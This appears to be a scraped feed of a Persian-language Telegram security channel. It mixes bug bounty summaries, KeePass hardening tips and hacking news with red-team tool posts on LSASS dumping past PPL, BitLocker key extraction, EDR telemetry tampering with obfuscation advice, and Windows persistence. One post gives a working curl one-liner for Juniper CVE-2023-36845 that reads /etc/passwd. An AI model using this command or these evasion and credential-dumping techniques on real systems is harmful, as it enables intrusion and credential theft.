Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
⭕️ How did I get $3300 With Just FFUF!!

در این مقاله هکر توضیح میده که چطوری با استفاده از ابزار
FFUF تونسته 3300 دلار بانتی دریافت کنه.

هکر فایلی رو اپلود کرده و وبسایت اون فایل رو با داشتن ID فایل به کاربر نشون میده. هکر تصمیم گرفته ایدی فایل رو عوض کنه و تصمیم گرفته از ابزار ffuf استفاده کنه و ID های مختلف رو تست کنه تا ببینه نتیجه ای میگیره یا نه.

نتیجه تست این شد که حدود 3 گیگابایت اطلاعات پاسپورت و مدارک کاربر های دیگ رو پیدا کرده و ریپورت داده.

لینک مقاله:
🔗 https://bit.ly/3300bucks-ffuf

#BugBounty
@securation
👍17👎4😁3🔥21
⭕️برای ذخیره پسورد های حساب ها از برنامه های متفاوتی استفاده میشه بعضی بر روی کلود هستند و بعضی لوکال.
از ابزار هایی که به صورت لوکال نگهداری میکند ابزار Keepass هست که مدتی پیش آسیب پذیری هایی بر روی آن پیدا شد.در این پست یک سری نکاتی رو عنوان میکنم که ترجیحا رعایت کنیم بهتره.
در ابتدا توصیه ای که میشود فایل دیتابیس پسورد ها را در درایور bitlocker قرار بدید و بعد از باز کردن برنامه درایور را قفل کنید و به هیچ عنوان از قابلیت auto unlock که از TMP برای باز گشایی درایور رمز شده، استفاده نکنید ( چند هفته گذشته گزارشی مبنی بر شکستن Bitlocker در لپتاپ لنوو اتفاق افتاد که خب بعید نیست در سیستم های دیگر هم امکان این باشه بالاخره همیشه پای side-channel ها وسط هست).
مورد دوم سعی کنید از قابلیت کپی برنامه استفاده نکنید حتی با اینکه بعد از کپی از کلیپ بورد حذف میشود و تایپ کنید پسورد هاتون رو.
مورد سوم بعد از اتمام کار حتما برنامه را قفل و یا ببندید در پس زمینه باز نباشد.
مورد چهارم به ورژن 2.54 و یا جدید تر اپدیت کنید
پسورد master را تغییر دهید
‏crash dump رو در C:\Windows\memory.dmp از بین ببرید
فایل hibernation را از بین ببرید
‏pagefile/swapfile را از بین ببرید و البته فراموش نکنید که دوباره فعالش کنید
البته میتونید هارد را overwrite کنید و ویندوز جدید نصب کنید جای همه این کار ها.

https://github.com/vdohney/keepass-password-dumper
#keepass #hardening
@securation
👍9👎41
⭕️ یک محقق امنیتی اومده با تکنیک های #osint روی گروه آشیانه و dark coders کار کرده و عکسهای شخصی و تیمی این گروه ها و دامنه ها و لیست ایمیل و ایدی هاشون و اسمهایی که باهاشون دیفیس میزدند و لیست اعضایی که توی روزنامه ها و خبرهای مختلف منتشر میشده و کلی مبحث دیگه رو تحلیل و بصورت عمومی منتشر کرده
یادش بخیر این گروه ها چقد باحالن عکسهاشون😁

https://ddanchev.blogspot.com/search?q=Ashiyane+&x=41&y=7
#osint
@securation
😁22😢1
⭕️ متاسفانه دیتای #تپسی در دارک وب هم درحال فروش است.
https://twitter.com/FalconFeedsio/status/1698651954967097622?t=L2Dzg6DiOsIAxVQYdA77ew&s=19
@securation
😁18👎6😱6😢4👍31🔥1
⭕️ در پست های گذشته اشاره ای به مکانیزم PPL و جلوگیری از استخراج LSASS و البته ابزار و تکنیک PPLBLADE کرده شد.،به شرح آن میپردازم.
در ابتدا باید بپرسیم که PPL چیست ؟ ‏Protected Process Light مکانیزمی است که از ویندوز 8.1 به بعد به ویندوز اضافه شده و وظیفه آن اجرا شدن سرویس ها و پروسه های معتبر با signature های داخلی و خارجی معتبر است.
برای دور زدن آن ما با استفاده از درایور ابزار process explorer به نام PROCEXP152.sys
‏با استفاده از object، ‏PROCESS_ALL_ACCESS میتوانیم PPL را دور بزنیم.
به طوری که با فراخوانی PROCEXP152.sys و استفاده از API هایی اعم از DeviceIoControl و MiniDumpWriteDump
و استفاده از مبهم سازی فایل خروجی گرفته شده با الگوریتم XOR و یا انتقال آن به محلی دیگر تحت RAW و SMB اقدام به انجام این کار میکنیم.

https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

https://github.com/tastypepperoni/PPLBlade
#RedTeam
@securation
🔥65👍3🤩1
⭕️ رسانه های اسراییلی خبر از اختلال در سیستم ریلی این کشور میدن ، استفاده از محصولات شرکت امنیتی Checkpoint و اکسپلویت های اون نقش مهمی در حملات سایبری هکرهای ایرانی به این سیستم شده است.
همچنین هکرهای ایرانی بیش از ۳۰ شرکت اسرائیلی را با استفاده از آسیب پذیری های Exchange مورد نفوذ قرار داده اند.
شرکت ESET اعلام کرد که هکرهای ایرانی با سوء استفاده از آسیب پذیریهای شناخته شده در Microsoft Exchange نسبت به نصب Backdoorهایی در سرورهای هدف اقدام کرده اند که به آنها اجازه ورود به شبکه‌ها را می‌دهد.
شرکتهای هدف قرارگرفته شامل شرکت‌های بیمه، پزشکی، صنعتی، ارتباطات، فناوری اطلاعات، فناوری، خودروسازی ، حقوقی، خدمات مالی، معماری و مهندسی عمران هستند.
https://www.ynetnews.com/business/article/rjrs5pn02

https://news.walla.co.il/break/3373519
#Israel #war #checkpoint
👍28😁10👎8🔥1
⭕️ بنظر میاد ثبت احوال هک شده و هکر به زیرساخت کل دسترسی کامل داشته!

تصویر فوق منتشر شده توسط هکرها میباشد که دسترسی کامل به سرویس های زیرساختی را نشان میدهد.
+ وبسایت ثبت احوال از دسترس خارج شده است.

@securation
😁77👎12👍7😱62🔥2😢2🎉1
⭕️ابزار جالبی برای استخراج کلید بازیابی bitlocker اخیرا نوشته شده است.
این ابزار با استفاده از اتصال به LDAP لیست کامپیوتر هارا در دامین شناسایی کرده و اقدام به کشف و استخراج کلید بازیابی bitlocker میکند.
نکته مورد اهمیت این است که خروجی این ابزار در فایل های json,xslx,sqlite3 موارد زیر میباشد:
‏FQDN کامیپوتر ها
کلید بازیابی
‏GUID درایو مورد نظر
‏OU سازنده
در آخر باید در نظر داشت که پس از تولید کلید بازیابی آن را پرینت کرده و در گاوصندق به صورت فیزیکی نگهداری کنید:)

https://github.com/p0dalirius/ExtractBitlockerKeys
#RedTeam
@securation
👍101🔥1
⭕️ اگر به دور زدن AV و EDR ها علاقه مند هستید ابزاری بر روی کشف منابع telemetry آن ها وجود دارد که برای تمرین و البته تحلیل بسیار مفید خواهد بود.
از این ابزار میتوان برای موارد زیر استفاده کرد:
شناسایی نقاط کور در محصولات.
مشخص کننده اینکه کدام telemetry چه اقداماتی را انجام میدهد.
بررسی آنکه ایا با دستکاری منجر به شناسایی میشود یا خیر.
قابلیت شناسایی Kernel-Mode Callback ها و دستکاری آن ها دارد.
قابلیت شناسایی inline user-mode hooks و دسترسی به آن را دارد.
انواع ETW هارا شناسایی و قابلیت غیر فعال سازی آنها را دارد.
نکته OPPSEC: در آخر در نظر داشته باشید این ابزار برای محیط واقعی ساخته نشده و برای تمرین است. در صورت نیاز از کد در پروژه دیگری استفاده و اقدام به مبهم سازی و تکنیک های دیگر کنید تا رد پای کمتری بماند.

https://github.com/jthuraisamy/TelemetrySourcerer
#RedTeam
@securation
6👍3
⭕️ Tricky 2FA Bypass Leads to 4 digit Bounty $$$$

همانطور که میدونید، 2fa همان احراز هویت دو عاملی هست، و برای این استفاده میشه که کاربران رو مجبور کنه قبل از دسترسی به حساب یا سیستم یا اپلیکشن دو فاکتور احراز هویت ارائه بدن.

هکر در این مقاله اول اقدام به ساخت یک حساب کرده و بعد احراز هویت دوعاملی یا 2fa رو فعال کرده و از اکانت خارج شده.
در مرحله بعد به صفحه ی "فراموشی رمز عبور" رفته و رمز عبور اکانت رو ریست کرده و تونسته بدون ارائه 2fa رمز اکانت رو تغییر بده و لاگین کنه.

این اسیب پذیری یک پیکربندی اشتباه سمت سرور هستش، وبسایت برای اینکه رمز اکانت رو تغییر بده باید درخواست 2fa میکرد که اینکارو انجام نداد و باعث این اسیب پذیری شد.

لینک مقاله:

🔗 https://bit.ly/2fa-bypass-sep-2023

#ATO #2FA
@securation
👍91
Forwarded from Yashar Mahmoudnia
_
🦅 تیم امنیت نرم افزار بایت امن | مرجع تخصصی در حوزه باینری

🏳️ برنامه نویسی | تحلیل بدافزار | توسعه آسیب پذیری | مهندسی معکوس | امنیت نرم افزار

🐞 به همراه گروه پرسش و پاسخ و منابع آموزشی

🌐 @SecureByte | Group
_
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥97👎5👍2
⭕️آسیب پذیری با شماره CVE-2023-29357 برای Microsoft SharePoint Server ثبت شده که اکسپلویت اون در گیت هاب در دسترس است.
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.


https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@securation
🤩12👍3😱2🔥1
⭕️Juniper Web Device Manager - RCE
CVE-2023-36845



curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST

Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu

#CVE #Juniper
@securation
👍5👎1
⭕️اگر به توسعه ابزار های Persistence در ویندوز علاقه مندید ابزاری با زبان C# نوشته شده که امکاناتی دارد.
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
‏Eventviewer
‏Startup
‏Autologon
‏Screensaver
‏Powershell Profile
‏WMI
‏Schedule
‏Winlogon
‏Extension Hijacking

https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@securation
👍11
⭕️ SQL injection to RCE

در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.

پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.

2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.

لینک مقاله:

🔗 https://bit.ly/sqli-to-rce-sep-28-2023

#RCE #SQLI
@securation
👍122
⭕️ آسیب پذیری با شناسه ثبت شده CVE-2023-42115 که برای Exim اومده میلیون ها سرور آسیب پذیر که منجر به هک شدن توسط این آسیب پذیری میشه داره.
آسیب پذیری RCE کشف شده فعلا واسش حتی Patch هم نیومده و یا باید دسترسی به سرور رو محدود کرد یا سرور رو خاموش کرد:)
⭕️ نکته مهم :
تصویر ضمیمه شده تعداد بالای آسیب پذیریهای ایران رو نشون میده و باید بزودی منتظر هک شدن کل ایران باشم.


https://www.bleepingcomputer.com/news/security/millions-of-exim-mail-servers-exposed-to-zero-day-rce-attacks/

#0day #Exim #attack #cve
@securation
12👍4🔥2👎1
⭕️ فساد و تقلب در حکومت عراق انقدر بالاست که شبیه به رفقای خودشون موقع امتحانات پایان ترم ، اینترنت رو قطع میکنند تا کسی تقلب نکنه!
شمال عراق که مناطق کردنشین هستن اینترنت متصل است.
#فساد #عراق
@securation
👍26👎14😁4🤩3
⭕️ اگر از ابزار BloodHound استفاده میکنید ابزار جدیدی برای AUDIT اکتیو دایرکتوری با استفاده از آن توسعه داده شده که لیستی از ضعف ها و ریسک هارا در بر گرفته است.
تعدادی از موارد مورد شناسایی این ابزار:
‏Kerberoastable اکانت ها
‏AS-REP Roastable اکانت ها
‏SID history اکانت ها
دسترسی های RDP
دسترسی های ادمین لوکال ADCS
یوزر هایی که دسترسی ادمین دارند
افزایش دسترسی از DC SHADOW به دسترسی های بالاتر

https://github.com/Mazars-Tech/AD_Miner
#RedTeam #AD

@securation
👍131👎1
⭕️ بلومبرگ نوشته نسل بعدی کلاهبرداری‌ها اینطوری خواهد بود که رئیس‌تون باهاتون تماس ویدئویی می‌گیره و بهتون می‌گه فوری از حساب شرکت فلان مبلغ درشت‌و به فلان حساب بریزین. در حالیکه کل تماس با تقلید کامل صدا و رفتار و ظاهر رئیس شما DeepFake و جعلیه.
زمینه ی این اتفاق داره به سرعت شکل میگیره و اتفاقات از این جنس دارن بیشتر و بیشتر می‌افتن. مثلا سال ٢٠١٩ مدیرعامل یکی از شرکتهای حوزه انرژی تو انگلیس با همین روش فریب خورد و قانع شد ٢۵٠ هزار دلار به حسابی که کلاهبردار که ادعا میکرد یکی از مدیران شرکت بالادستی آلمانیه واریز کنه.
توی این مورد کلاهبرداری ‏اون مدیر بصورت مصنوعی توسط هوش مصنوعی جعل شده بود و چون قربانی اون مدیرو می‌شناخت، ذره‌ای به اصالت تماس شک نکرده بود.
https://www.bloomberg.com/news/articles/2023-08-25/deepfake-video-phone-calls-could-be-a-dangerous-ai-powered-scam?leadSource=uverify%20wall

#deepfake #scam #ai
@securation
🔥20👍6😱6😁4